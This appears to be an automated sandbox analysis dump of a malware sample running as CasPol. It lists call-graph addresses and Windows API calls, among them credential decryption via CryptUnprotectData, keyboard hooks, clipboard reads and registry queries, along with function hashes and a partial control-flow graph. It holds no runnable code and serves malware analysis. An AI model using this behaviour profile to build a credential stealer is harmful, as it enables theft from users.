GlobalMemoryStatusEx 81235->81240 81236->80925 81237->81234 81238->81234 81239->81236 81240->81236 81241->81235 81242->81235 81244 c4a525 81243->81244 81252 10fad00 CryptUnprotectData 81244->81252 81253 10facf0 CryptUnprotectData 81244->81253 81245 c4a541 81250 110b140 2 API calls 81245->81250 81251 110b1a0 2 API calls 81245->81251 81246 c4aa21 81247 c4aa89 81246->81247 81248 110bc40 GlobalMemoryStatusEx 81246->81248 81249 110bc3f GlobalMemoryStatusEx 81246->81249 81247->80925 81248->81247 81249->81247 81250->81246 81251->81246 81252->81245 81253->81245 81255 c4a825 81254->81255 81260 110b140 2 API calls 81255->81260 81261 110b1a0 2 API calls 81255->81261 81256 c4aa21 81257 c4aa89 81256->81257 81258 110bc40 GlobalMemoryStatusEx 81256->81258 81259 110bc3f GlobalMemoryStatusEx 81256->81259 81257->80925 81258->81257 81259->81257 81260->81256 81261->81256 81263 c4a795 81262->81263 81266 110b140 2 API calls 81263->81266 81267 110b1a0 2 API calls 81263->81267 81264 c4aa89 81264->80925 81265 c4aa21 81265->81264 81268 110bc40 GlobalMemoryStatusEx 81265->81268 81269 110bc3f GlobalMemoryStatusEx 81265->81269 81266->81265 81267->81265 81268->81264 81269->81264 81282 c49b1e 81270->81282 81271 c49f6d LdrInitializeThunk 81272 c49fb2 81271->81272 81278 10fad00 CryptUnprotectData 81272->81278 81279 10facf0 CryptUnprotectData 81272->81279 81273 c4a541 81276 110b140 2 API calls 81273->81276 81277 110b1a0 2 API calls 81273->81277 81274 c4aa21 81275 c4aa89 81274->81275 81280 110bc40 GlobalMemoryStatusEx 81274->81280 81281 110bc3f GlobalMemoryStatusEx 81274->81281 81275->80925 81276->81274 81277->81274 81278->81273 81279->81273 81280->81275 81281->81275 81282->81271 81295 c49e0c 81283->81295 81284 c49f6d LdrInitializeThunk 81285 c49fb2 81284->81285 81289 10fad00 CryptUnprotectData 81285->81289 81290 10facf0 CryptUnprotectData 81285->81290 81286 c4a541 81293 110b140 2 API calls 81286->81293 81294 110b1a0 2 API calls 81286->81294 81287 c4aa21 81288 c4aa89 81287->81288 81291 110bc40 GlobalMemoryStatusEx 81287->81291 81292 110bc3f GlobalMemoryStatusEx 81287->81292 81288->80925 81289->81286 81290->81286 81291->81288 81292->81288 81293->81287 81294->81287 81295->81284 81297 c4a495 81296->81297 81303 10fad00 CryptUnprotectData 81297->81303 81304 10facf0 CryptUnprotectData 81297->81304 81298 c4a541 81301 110b140 2 API calls 81298->81301 81302 110b1a0 2 API calls 81298->81302 81299 c4aa21 81300 c4aa89 81299->81300 81305 110bc40 GlobalMemoryStatusEx 81299->81305 81306 110bc3f GlobalMemoryStatusEx 81299->81306 81300->80925 81301->81299 81302->81299 81303->81298 81304->81298 81305->81300 81306->81300 81308 c4a98d 81307->81308 81311 110b140 2 API calls 81308->81311 81312 110b1a0 2 API calls 81308->81312 81309 c4aa21 81310 c4aa89 81309->81310 81313 110bc40 GlobalMemoryStatusEx 81309->81313 81314 110bc3f GlobalMemoryStatusEx 81309->81314 81310->80925 81311->81309 81312->81309 81313->81310 81314->81310 81325 c49d8b 81315->81325 81316 c49f6d LdrInitializeThunk 81317 c49fb2 81316->81317 81321 10fad00 CryptUnprotectData 81317->81321 81322 10facf0 CryptUnprotectData 81317->81322 81318 c4a541 81326 110b140 2 API calls 81318->81326 81327 110b1a0 2 API calls 81318->81327 81319 c4aa21 81320 c4aa89 81319->81320 81323 110bc40 GlobalMemoryStatusEx 81319->81323 81324 110bc3f GlobalMemoryStatusEx 81319->81324 81320->80925 81321->81318 81322->81318 81323->81320 81324->81320 81325->81316 81326->81319 81327->81319 81329 c4aa05 81328->81329 81334 110b140 2 API calls 81329->81334 81335 110b1a0 2 API calls 81329->81335 81330 c4aa21 81331 c4aa89 81330->81331 81332 110bc40 GlobalMemoryStatusEx 81330->81332 81333 110bc3f GlobalMemoryStatusEx 81330->81333 81331->80925 81332->81331 81333->81331 81334->81330 81335->81330 81348 c49d01 81336->81348 81337 c49f6d LdrInitializeThunk 81338 c49fb2 81337->81338 81342 10fad00 CryptUnprotectData 81338->81342 81343 10facf0 CryptUnprotectData 81338->81343 81339 c4a541 81346 110b140 2 API calls 81339->81346 81347 110b1a0 2 API calls 81339->81347 81340 c4aa21 81341 c4aa89 81340->81341 81344 110bc40 GlobalMemoryStatusEx 81340->81344 81345 110bc3f GlobalMemoryStatusEx 81340->81345 81341->80925 81342->81339 81343->81339 81344->81341 81345->81341 81346->81340 81347->81340 81348->81337 81350 c4a405 81349->81350 81356 10fad00 CryptUnprotectData 81350->81356 81357 10facf0 CryptUnprotectData 81350->81357 81351 c4a541 81354 110b140 2 API calls 81351->81354 81355 110b1a0 2 API calls 81351->81355 81352 c4aa21 81353 c4aa89 81352->81353 81358 110bc40 GlobalMemoryStatusEx 81352->81358 81359 110bc3f GlobalMemoryStatusEx 81352->81359 81353->80925 81354->81352 81355->81352 81356->81351 81357->81351 81358->81353 81359->81353 81361 c499af 81360->81361 81372 ffa9db LdrInitializeThunk 81361->81372 81373 ffa9e0 LdrInitializeThunk 81361->81373 81362 c49f6d LdrInitializeThunk 81363 c49fb2 81362->81363 81370 10fad00 CryptUnprotectData 81363->81370 81371 10facf0 CryptUnprotectData 81363->81371 81364 c4a541 81367 110b140 2 API calls 81364->81367 81368 110b1a0 2 API calls 81364->81368 81365 c4aa21 81366 c4aa89 81365->81366 81374 110bc40 GlobalMemoryStatusEx 81365->81374 81375 110bc3f GlobalMemoryStatusEx 81365->81375 81366->80925 81367->81365 81368->81365 81369 c49adc 81369->81362 81370->81364 81371->81364 81372->81369 81373->81369 81374->81366 81375->81366 81377 c4a8b5 81376->81377 81382 110b140 2 API calls 81377->81382 81383 110b1a0 2 API calls 81377->81383 81378 c4aa21 81379 c4aa89 81378->81379 81380 110bc40 GlobalMemoryStatusEx 81378->81380 81381 110bc3f GlobalMemoryStatusEx 81378->81381 81379->80925 81380->81379 81381->81379 81382->81378 81383->81378 81385 c49a7e 81384->81385 81396 ffa9db LdrInitializeThunk 81385->81396 81397 ffa9e0 LdrInitializeThunk 81385->81397 81386 c49f6d LdrInitializeThunk 81387 c49fb2 81386->81387 81394 10fad00 CryptUnprotectData 81387->81394 81395 10facf0 CryptUnprotectData 81387->81395 81388 c4a541 81391 110b140 2 API calls 81388->81391 81392 110b1a0 2 API calls 81388->81392 81389 c4aa21 81390 c4aa89 81389->81390 81398 110bc40 GlobalMemoryStatusEx 81389->81398 81399 110bc3f GlobalMemoryStatusEx 81389->81399 81390->80925 81391->81389 81392->81389 81393 c49adc 81393->81386 81394->81388 81395->81388 81396->81393 81397->81393 81398->81390 81399->81390 81401 c4a5f1 81400->81401 81406 110b140 2 API calls 81401->81406 81407 110b1a0 2 API calls 81401->81407 81402 c4aa21 81403 c4aa89 81402->81403 81404 110bc40 GlobalMemoryStatusEx 81402->81404 81405 110bc3f GlobalMemoryStatusEx 81402->81405 81403->80925 81404->81403 81405->81403 81406->81402 81407->81402 81409 c499f4 81408->81409 81418 ffa9db LdrInitializeThunk 81409->81418 81419 ffa9e0 LdrInitializeThunk 81409->81419 81410 c49f6d LdrInitializeThunk 81411 c49fb2 81410->81411 81416 10fad00 CryptUnprotectData 81411->81416 81417 10facf0 CryptUnprotectData 81411->81417 81412 c4a541 81422 110b140 2 API calls 81412->81422 81423 110b1a0 2 API calls 81412->81423 81413 c4aa21 81414 c4aa89 81413->81414 81420 110bc40 GlobalMemoryStatusEx 81413->81420 81421 110bc3f GlobalMemoryStatusEx 81413->81421 81414->80925 81415 c49adc 81415->81410 81416->81412 81417->81412 81418->81415 81419->81415 81420->81414 81421->81414 81422->81413 81423->81413 81432 c49c77 81424->81432 81425 c49f6d LdrInitializeThunk 81426 c49fb2 81425->81426 81433 10fad00 CryptUnprotectData 81426->81433 81434 10facf0 CryptUnprotectData 81426->81434 81427 c4a541 81430 110b140 2 API calls 81427->81430 81431 110b1a0 2 API calls 81427->81431 81428 c4aa21 81429 c4aa89 81428->81429 81435 110bc40 GlobalMemoryStatusEx 81428->81435 81436 110bc3f GlobalMemoryStatusEx 81428->81436 81429->80925 81430->81428 81431->81428 81432->81425 81433->81427 81434->81427 81435->81429 81436->81429 81438 c4a2f1 81437->81438 81442 10fad00 CryptUnprotectData 81438->81442 81443 10facf0 CryptUnprotectData 81438->81443 81439 c4a541 81446 110b140 2 API calls 81439->81446 81447 110b1a0 2 API calls 81439->81447 81440 c4aa21 81441 c4aa89 81440->81441 81444 110bc40 GlobalMemoryStatusEx 81440->81444 81445 110bc3f GlobalMemoryStatusEx 81440->81445 81441->80925 81442->81439 81443->81439 81444->81441 81445->81441 81446->81440 81447->81440 81449 c4a375 81448->81449 81453 10fad00 CryptUnprotectData 81449->81453 81454 10facf0 CryptUnprotectData 81449->81454 81450 c4a541 81457 110b140 2 API calls 81450->81457 81458 110b1a0 2 API calls 81450->81458 81451 c4aa21 81452 c4aa89 81451->81452 81455 110bc40 GlobalMemoryStatusEx 81451->81455 81456 110bc3f GlobalMemoryStatusEx 81451->81456 81452->80925 81453->81450 81454->81450 81455->81452 81456->81452 81457->81451 81458->81451 81460 c4a705 81459->81460 81463 110b140 2 API calls 81460->81463 81464 110b1a0 2 API calls 81460->81464 81461 c4aa21 81462 c4aa89 81461->81462 81465 110bc40 GlobalMemoryStatusEx 81461->81465 81466 110bc3f GlobalMemoryStatusEx 81461->81466 81462->80925 81463->81461 81464->81461 81465->81462 81466->81462 81468 c4a675 81467->81468 81471 110b140 2 API calls 81468->81471 81472 110b1a0 2 API calls 81468->81472 81469 c4aa21 81470 c4aa89 81469->81470 81473 110bc40 GlobalMemoryStatusEx 81469->81473 81474 110bc3f GlobalMemoryStatusEx 81469->81474 81470->80925 81471->81469 81472->81469 81473->81470 81474->81470 81476 c4996a 81475->81476 81485 ffa9db LdrInitializeThunk 81476->81485 81486 ffa9e0 LdrInitializeThunk 81476->81486 81477 c49adc 81478 c49f6d LdrInitializeThunk 81477->81478 81479 c49fb2 81478->81479 81487 10fad00 CryptUnprotectData 81479->81487 81488 10facf0 CryptUnprotectData 81479->81488 81480 c4a541 81483 110b140 2 API calls 81480->81483 81484 110b1a0 2 API calls 81480->81484 81481 c4aa21 81482 c4aa89 81481->81482 81489 110bc40 GlobalMemoryStatusEx 81481->81489 81490 110bc3f GlobalMemoryStatusEx 81481->81490 81482->80925 81483->81481 81484->81481 81485->81477 81486->81477 81487->81480 81488->81480 81489->81482 81490->81482 81499 c49bed 81491->81499 81492 c49f6d LdrInitializeThunk 81493 c49fb2 81492->81493 81500 10fad00 CryptUnprotectData 81493->81500 81501 10facf0 CryptUnprotectData 81493->81501 81494 c4a541 81497 110b140 2 API calls 81494->81497 81498 110b1a0 2 API calls 81494->81498 81495 c4aa21 81496 c4aa89 81495->81496 81502 110bc40 GlobalMemoryStatusEx 81495->81502 81503 110bc3f GlobalMemoryStatusEx 81495->81503 81496->80925 81497->81495 81498->81495 81499->81492 81500->81494 81501->81494 81502->81496 81503->81496 81505 c4a56d 81504->81505 81508 110b140 2 API calls 81505->81508 81509 110b1a0 2 API calls 81505->81509 81506 c4aa21 81507 c4aa89 81506->81507 81510 110bc40 GlobalMemoryStatusEx 81506->81510 81511 110bc3f GlobalMemoryStatusEx 81506->81511 81507->80925 81508->81506 81509->81506 81510->81507 81511->81507 81513 c4aa63 81512->81513 81514 c4aa89 81513->81514 81515 110bc40 GlobalMemoryStatusEx 81513->81515 81516 110bc3f GlobalMemoryStatusEx 81513->81516 81514->80925 81515->81514 81516->81514 81518 110de3b 81517->81518 81520 110de80 81518->81520 81632 110d7c0 81518->81632 81520->80923 81522 110de3b 81521->81522 81523 110d7c0 SetWindowsHookExW 81522->81523 81524 110de80 81522->81524 81523->81522 81524->80923 81526 110b161 81525->81526 81530 110b184 81525->81530 81526->80979 81527 110b427 81527->80979 81529 1107a30 RegQueryValueExW 81529->81530 81530->81527 81530->81529 81546 1107a24 81530->81546 81535 110b1a2 81531->81535 81532 110b427 81532->80979 81533 1107a24 RegOpenKeyExW 81533->81535 81534 1107a30 RegQueryValueExW 81534->81535 81535->81532 81535->81533 81535->81534 81538 110bc55 81536->81538 81537 110bf34 81537->80980 81538->81537 81539 110c267 GlobalMemoryStatusEx 81538->81539 81550 110c3bc 81538->81550 81539->81538 81542 110bc55 81541->81542 81543 110bf34 81542->81543 81544 110c3bc GlobalMemoryStatusEx 81542->81544 81545 110c267 GlobalMemoryStatusEx 81542->81545 81543->80980 81544->81542 81545->81542 81547 110b4b0 RegOpenKeyExW 81546->81547 81549 110b576 81547->81549 81551 110c3bd 81550->81551 81552 110c3ff 81551->81552 81555 110c547 81551->81555 81559 110c558 81551->81559 81552->81538 81556 110c558 81555->81556 81562 110c58f 81556->81562 81557 110c566 81557->81552 81561 110c58f GlobalMemoryStatusEx 81559->81561 81560 110c566 81560->81552 81561->81560 81563 110c59d 81562->81563 81565 110c5c5 81562->81565 81563->81557 81564 110c5e6 81564->81557 81565->81564 81566 110c6ae GlobalMemoryStatusEx 81565->81566 81567 110c6de 81566->81567 81567->81557 81569 10fad20 81568->81569 81584 ff798e 81569->81584 81588 ff7ba4 81569->81588 81592 ff78d0 81569->81592 81596 ff796e 81569->81596 81600 ff78c8 81569->81600 81570 10fad4a 81570->80987 81577 10fad20 81576->81577 81579 ff798e CryptUnprotectData 81577->81579 81580 ff796e CryptUnprotectData 81577->81580 81581 ff78c8 CryptUnprotectData 81577->81581 81582 ff7ba4 CryptUnprotectData 81577->81582 81583 ff78d0 CryptUnprotectData 81577->81583 81578 10fad4a 81578->80987 81579->81578 81580->81578 81581->81578 81582->81578 81583->81578 81586 ff7929 81584->81586 81585 ff7bdc 81585->81570 81586->81585 81604 11028e5 81586->81604 81590 ff7929 81588->81590 81589 ff7bdc 81589->81570 81590->81589 81591 11028e5 CryptUnprotectData 81590->81591 81591->81590 81594 ff78f0 81592->81594 81593 ff7bdc 81593->81570 81594->81593 81595 11028e5 CryptUnprotectData 81594->81595 81595->81594 81598 ff7929 81596->81598 81597 ff7bdc 81597->81570 81598->81597 81599 11028e5 CryptUnprotectData 81598->81599 81599->81598 81602 ff78f0 81600->81602 81601 ff7bdc 81601->81570 81602->81601 81603 11028e5 CryptUnprotectData 81602->81603 81603->81602 81605 11028f9 81604->81605 81608 1102f67 81605->81608 81609 1102f83 81608->81609 81613 1103180 81609->81613 81617 1103188 81609->81617 81610 1103011 81614 1103188 81613->81614 81621 1102c6c 81614->81621 81618 11031a5 81617->81618 81619 1102c6c CryptUnprotectData 81618->81619 81620 11031dd 81619->81620 81620->81610 81622 11033c8 CryptUnprotectData 81621->81622 81623 11031dd 81622->81623 81623->81610 81625 ffa9ff LdrInitializeThunk 81624->81625 81627 ffaa51 81625->81627 81627->81037 81629 ffa9ff LdrInitializeThunk 81628->81629 81631 ffaa51 81629->81631 81631->81037 81635 110deb8 SetWindowsHookExW 81632->81635 81634 110df42 81634->81518 81635->81634 81823 1dce19a8 81826 1dce19d7 81823->81826 81825 1dce1afc 81827 1dce1730 81826->81827 81828 1dce173b 81827->81828 81829 1dce201a 81828->81829 81830 1dce4798 4 API calls 81828->81830 81831 1dce4783 4 API calls 81828->81831 81829->81825 81830->81829 81831->81829 81832 1dcea3a8 81833 1dcea3ee 81832->81833 81837 1dcea57a 81833->81837 81841 1dcea588 81833->81841 81834 1dcea4db 81838 1dcea583 81837->81838 81844 1dce9f54 81838->81844 81842 1dce9f54 DuplicateHandle 81841->81842 81843 1dcea5b6 81842->81843 81843->81834 81845 1dcea5f0 DuplicateHandle 81844->81845 81846 1dcea5b6 81845->81846 81846->81834 81847 d3db74 81848 d3db8a TerminateThread 81847->81848 81850 d3dc8d 81848->81850 81910 110ae68 81911 110ae87 LdrInitializeThunk 81910->81911 81913 110aebb 81911->81913 80788 c45d08 80789 c45d18 80788->80789 80792 c42734 80789->80792 80793 c45d60 KiUserCallbackDispatcher 80792->80793 80795 c45d1f 80793->80795 81851 c03f6c 81852 c051e8 LoadLibraryExW 81851->81852 81854 c05261 81852->81854 81636 1dc3d01c 81637 1dc3d034 81636->81637 81638 1dc3d08e 81637->81638 81645 1dce436c 81637->81645 81655 1dce68b0 81637->81655 81661 1dce69d0 81637->81661 81666 1dce68a0 81637->81666 81672 1dce435c 81637->81672 81676 1dceb1f8 81637->81676 81646 1dce4377 81645->81646 81647 1dceb269 81646->81647 81649 1dceb259 81646->81649 81708 1dcea124 81647->81708 81686 c05748 81649->81686 81691 1dceb390 81649->81691 81697 c05738 81649->81697 81702 1dceb382 81649->81702 81650 1dceb267 81650->81650 81656 1dce68d6 81655->81656 81657 1dce435c 3 API calls 81656->81657 81658 1dce68e2 81657->81658 81659 1dce436c 5 API calls 81658->81659 81660 1dce68f7 81659->81660 81660->81638 81662 1dce69de 81661->81662 81665 1dce6992 81661->81665 81817 1dce4394 81662->81817 81664 1dce69e7 81664->81638 81665->81638 81667 1dce68d6 81666->81667 81668 1dce435c 3 API calls 81667->81668 81669 1dce68e2 81668->81669 81670 1dce436c 5 API calls 81669->81670 81671 1dce68f7 81670->81671 81671->81638 81673 1dce4367 81672->81673 81674 1dce4394 3 API calls 81673->81674 81675 1dce69e7 81674->81675 81675->81638 81679 1dceb235 81676->81679 81677 1dceb269 81678 1dcea124 5 API calls 81677->81678 81681 1dceb267 81678->81681 81679->81677 81680 1dceb259 81679->81680 81682 c05748 5 API calls 81680->81682 81683 c05738 5 API calls 81680->81683 81684 1dceb382 5 API calls 81680->81684 81685 1dceb390 5 API calls 81680->81685 81681->81681 81682->81681 81683->81681 81684->81681 81685->81681 81688 c0575c 81686->81688 81687 c057e8 81687->81650 81715 c057f0 81688->81715 81718 c05800 81688->81718 81693 1dceb39e 81691->81693 81692 1dcea124 5 API calls 81692->81693 81693->81692 81694 1dceb487 81693->81694 81732 c46207 81693->81732 81737 c46208 81693->81737 81694->81650 81699 c0575c 81697->81699 81698 c057e8 81698->81650 81700 c057f0 5 API calls 81699->81700 81701 c05800 5 API calls 81699->81701 81700->81698 81701->81698 81704 1dceb39e 81702->81704 81703 1dcea124 5 API calls 81703->81704 81704->81703 81705 1dceb487 81704->81705 81706 c46207 3 API calls 81704->81706 81707 c46208 3 API calls 81704->81707 81705->81650 81706->81704 81707->81704 81709 1dcea12f 81708->81709 81710 1dceb4fa 81709->81710 81711 1dceb5a4 81709->81711 81712 1dceb552 CallWindowProcW 81710->81712 81714 1dceb501 81710->81714 81713 1dce436c 4 API calls 81711->81713 81712->81714 81713->81714 81714->81650 81716 c05811 81715->81716 81721 c06dc0 81715->81721 81716->81687 81719 c05811 81718->81719 81720 c06dc0 5 API calls 81718->81720 81719->81687 81720->81719 81724 1dcea124 5 API calls 81721->81724 81725 1dceb4a8 81721->81725 81722 c06dda 81722->81716 81724->81722 81726 1dceb4ad 81725->81726 81727 1dceb4fa 81726->81727 81728 1dceb5a4 81726->81728 81729 1dceb552 CallWindowProcW 81727->81729 81731 1dceb501 81727->81731 81730 1dce436c 4 API calls 81728->81730 81729->81731 81730->81731 81731->81722 81733 c46214 81732->81733 81734 c46433 81733->81734 81742 c46668 81733->81742 81748 c46678 81733->81748 81734->81693 81738 c46214 81737->81738 81739 c46433 81738->81739 81740 c46668 3 API calls 81738->81740 81741 c46678 3 API calls 81738->81741 81739->81693 81740->81738 81741->81738 81744 c46678 81742->81744 81743 c46694 81743->81733 81744->81743 81754 c466b0 81744->81754 81769 c466c0 81744->81769 81745 c466a9 81745->81733 81750 c46680 81748->81750 81749 c46694 81749->81733 81750->81749 81752 c466c0 3 API calls 81750->81752 81753 c466b0 3 API calls 81750->81753 81751 c466a9 81751->81733 81752->81751 81753->81751 81755 c466c0 81754->81755 81756 c466ed 81755->81756 81758 c46731 81755->81758 81767 c466c0 3 API calls 81756->81767 81768 c466b0 3 API calls 81756->81768 81757 c466f3 81757->81745 81784 c46861 81758->81784 81788 c46870 81758->81788 81759 c467ad 81761 c467b1 81759->81761 81792 c46a24 81759->81792 81797 c46988 81759->81797 81801 c46978 81759->81801 81760 c467cf 81760->81745 81761->81745 81767->81757 81768->81757 81770 c466d2 81769->81770 81771 c46731 81770->81771 81772 c466ed 81770->81772 81777 c46870 OleInitialize 81771->81777 81778 c46861 OleInitialize 81771->81778 81779 c466c0 3 API calls 81772->81779 81780 c466b0 3 API calls 81772->81780 81773 c466f3 81773->81745 81774 c467ad 81776 c467b1 81774->81776 81781 c46a24 OleGetClipboard 81774->81781 81782 c46988 OleGetClipboard 81774->81782 81783 c46978 OleGetClipboard 81774->81783 81775 c467cf 81775->81745 81776->81745 81777->81774 81778->81774 81779->81773 81780->81773 81781->81775 81782->81775 81783->81775 81785 c46878 81784->81785 81806 c4609c 81785->81806 81789 c46878 81788->81789 81790 c4609c OleInitialize 81789->81790 81791 c46881 81790->81791 81791->81759 81793 c46a2e OleGetClipboard 81792->81793 81795 c469cd 81792->81795 81796 c46aca 81793->81796 81795->81760 81799 c4699d 81797->81799 81800 c469c3 81799->81800 81813 c461b8 81799->81813 81800->81760 81802 c46982 81801->81802 81803 c4694c 81801->81803 81804 c461b8 OleGetClipboard 81802->81804 81805 c469c3 81802->81805 81803->81760 81804->81802 81805->81760 81807 c460a7 81806->81807 81809 c46881 81807->81809 81810 c428c4 81807->81810 81809->81759 81811 c468e8 OleInitialize 81810->81811 81812 c4694c 81811->81812 81812->81809 81814 c46a30 OleGetClipboard 81813->81814 81816 c46aca 81814->81816 81818 1dce439f 81817->81818 81819 1dce36a0 3 API calls 81818->81819 81820 1dce6a49 81819->81820 81821 1dce32bc GetModuleHandleW 81820->81821 81822 1dce6ab7 81820->81822 81821->81822

                                                                                                    Executed Functions

                                                                                                    Function 010FB148, Relevance: 3.4, Instructions: 3438COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9bb572de132d6a0dbc0026fbe22c24276a4c863e84e0193031e5a71af8be42ea
                                                                                                    • Instruction ID: cb001140cebee2be158a57e17572d3414e2b9309eff51355eddff578549c3d07
                                                                                                    • Opcode Fuzzy Hash: 9bb572de132d6a0dbc0026fbe22c24276a4c863e84e0193031e5a71af8be42ea
                                                                                                    • Instruction Fuzzy Hash: 05734E30D1471A8ECB11DF68C8446ADF7B1FF99300F15C69AE558AB665EB30AAC4CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010FB2FF, Relevance: 2.7, Instructions: 2669COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663017234.00000000010F0000.00000040.00000010.sdmp, Offset: 010F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_10f0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87e19d80c719066675cd8aa9e06b7afb111eb4ce32940f6732e67051cc1c943c
                                                                                                    • Instruction ID: f08cbad1fc2c620f499ff053159d5984c566c7853b77cd6c91998e849fedd41f
                                                                                                    • Opcode Fuzzy Hash: 87e19d80c719066675cd8aa9e06b7afb111eb4ce32940f6732e67051cc1c943c
                                                                                                    • Instruction Fuzzy Hash: 11531D30D14B1A8ACB11EF68C844A99F7B1FF99300F15D69AE1587B125EB70AAC4CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49938, Relevance: 2.5, APIs: 1, Instructions: 958libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 07195810f360b3f805ab1e77c65d76653b44b8cb085b698548556b12e316fe27
                                                                                                    • Instruction ID: fc4c1ccc6b45c5a1769d7d7c40a256cf8a8f5284d004c0f6c6ffbedba8849383
                                                                                                    • Opcode Fuzzy Hash: 07195810f360b3f805ab1e77c65d76653b44b8cb085b698548556b12e316fe27
                                                                                                    • Instruction Fuzzy Hash: DEA20774A09228CFCB64EF70C89869DB7B6BF48305F2085EAD549A3354DB349E81CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 010F2B78, Relevance: 1.7, Strings: 1, Instructions: 497COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 11100 10f2b78-10f2b87 11101 10f2bac-10f2bc1 11100->11101 11102 10f2b89-10f2b91 11100->11102 11103 10f2b92-10f2b93 11101->11103 11107 10f2bc3-10f2bed 11101->11107 11102->11103 11105 10f2ba8-10f2bab 11103->11105 11106 10f2b95-10f2ba6 11103->11106 11106->11105 11108 10f2bef-10f2bf2 11107->11108 11110 10f2c05-10f2c08 11108->11110 11111 10f2bf4-10f2bfa 11108->11111 11114 10f2c0e-10f2c58 call 10f1338 11110->11114 11115 10f2caa-10f2cad 11110->11115 11112 10f2de7-10f2deb 11111->11112 11113 10f2c00 11111->11113 11116 10f31d4 11112->11116 11117 10f2df1 11112->11117 11113->11110 11129 10f31d9-10f31e2 11114->11129 11206 10f2c5e-10f2c81 11114->11206 11119 10f2caf-10f2cb5 11115->11119 11120 10f2cc0-10f2cc3 11115->11120 11116->11129 11123 10f2df6-10f2df9 11117->11123 11125 10f2cbb 11119->11125 11126 10f2fea-10f3036 call 1dcedd10 11119->11126 11121 10f2cda-10f2cdd 11120->11121 11122 10f2cc5-10f2cd5 11120->11122 11127 10f304a-10f3050 11121->11127 11128 10f2ce3-10f2ce6 11121->11128 11122->11121 11130 10f2dfb-10f2e02 11123->11130 11131 10f2e3a-10f2e3d 11123->11131 11125->11120 11231 10f303d-10f3040 11126->11231 11132 10f3056 11127->11132 11133 10f2d03-10f2d15 11127->11133 11134 10f2cfa-10f2cfd 11128->11134 11135 10f2ce8-10f2cef 11128->11135 11130->11129 11138 10f2e08-10f2e35 11130->11138 11131->11119 11137 10f2e43-10f2e46 11131->11137 11140 10f305b-10f305e 11132->11140 11133->11129 11168 10f2d1b-10f2d61 11133->11168 11134->11133 11145 10f2daf-10f2db2 11134->11145 11141 10f2cf5 11135->11141 11142 10f31b0-10f31be 11135->11142 11143 10f2e48-10f2e4e call 10f31e9 11137->11143 11144 10f2e92-10f2e95 11137->11144 11138->11131 11150 10f3079-10f307c 11140->11150 11151 10f3060-10f3064 11140->11151 11141->11134 11142->11116 11147 10f31c0-10f31c2 11142->11147 11167 10f2e54-10f2e59 11143->11167 11148 10f2e97-10f2e9b 11144->11148 11149 10f2eb0-10f2eb3 11144->11149 11156 10f2dbe-10f2dc1 11145->11156 11157 10f2db4-10f2dbd 11145->11157 11147->11116 11160 10f31c4-10f31d3 11147->11160 11148->11129 11161 10f2ea1-10f2ea5 11148->11161 11163 10f2eb9-10f2eda 11149->11163 11164 10f2f35-10f2f38 11149->11164 11165 10f307e-10f3087 11150->11165 11166 10f3098-10f309b 11150->11166 11151->11129 11162 10f306a-10f306e 11151->11162 11158 10f2dc8-10f2dcb 11156->11158 11159 10f2dc3 11156->11159 11174 10f2dcd-10f2dd1 11158->11174 11175 10f2de2-10f2de5 11158->11175 11159->11158 11161->11174 11176 10f2eab 11161->11176 11162->11148 11177 10f3074 11162->11177 11163->11129 11220 10f2ee0-10f2eff 11163->11220 11172 10f2f4e-10f2f51 11164->11172 11173 10f2f3a-10f2f49 11164->11173 11165->11116 11178 10f308d-10f3095 11165->11178 11179 10f30a1-10f3142 call 1dcedd10 11166->11179 11180 10f3180-10f3183 11166->11180 11170 10f2e5b-10f2e61 11167->11170 11171 10f2e75 11167->11171 11239 10f2d74-10f2d7d 11168->11239 11240 10f2d63-10f2d72 11168->11240 11183 10f2e67-10f2e69 11170->11183 11184 10f2e63-10f2e65 11170->11184 11187 10f2e77-10f2e8d 11171->11187 11185 10f2f53-10f2f57 11172->11185 11186 10f2f62-10f2f65 11172->11186 11173->11172 11174->11129 11188 10f2dd7-10f2ddb 11174->11188 11175->11112 11175->11123 11176->11149 11177->11150 11178->11166 11179->11129 11262 10f3148-10f3150 11179->11262 11190 10f319e-10f31a0 11180->11190 11191 10f3185-10f318c 11180->11191 11196 10f2e73 11183->11196 11184->11196 11185->11116 11198 10f2f5d 11185->11198 11199 10f2fab-10f2fae 11186->11199 11200 10f2f67-10f2f72 11186->11200 11187->11144 11188->11112 11201 10f2ddd 11188->11201 11204 10f31a7-10f31aa 11190->11204 11205 10f31a2 11190->11205 11191->11129 11202 10f318e-10f3199 11191->11202 11196->11187 11198->11186 11211 10f2fe5-10f2fe8 11199->11211 11212 10f2fb0-10f2fbc 11199->11212 11208 10f2f8e 11200->11208 11209 10f2f74-10f2f7a 11200->11209 11201->11175 11202->11190 11204->11108 11204->11142 11205->11204 11229 10f2c9d-10f2ca5 11206->11229 11230 10f2c83-10f2c8a 11206->11230 11219 10f2f90-10f2fa6 11208->11219 11217 10f2f7c-10f2f7e 11209->11217 11218 10f2f80-10f2f82 11209->11218 